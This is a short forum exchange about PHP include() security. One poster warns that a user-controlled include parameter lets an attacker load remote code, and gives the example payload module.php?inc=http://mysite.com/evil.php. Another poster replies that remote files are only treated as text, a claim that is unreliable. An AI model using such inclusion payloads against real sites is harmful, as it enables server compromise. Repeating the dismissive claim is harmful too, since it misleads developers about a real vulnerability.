not the case - you can, I believe, include a file on a network, but it will be treated as text and not php code (afterall, how would it "know" the source code on the network file?). Even beyond that, the coding itself will not allow the file to be understood as inc is a "part" of the included file and it would just fail.
Also, about a year ago I got away from using include() entirely and went with require() as the page fails if the include can't be found. You couldn't get me to use include again except in very special cases.
Samuel
FatalError wrote:Yes...
That is really insecure, if you put that on your site right now I could include my own PHP file and completely ruin your server (module.php?inc=http://mysite.com/evil.php). These kind of things are dangerous, and you need to check to make sure the files you are including are safe.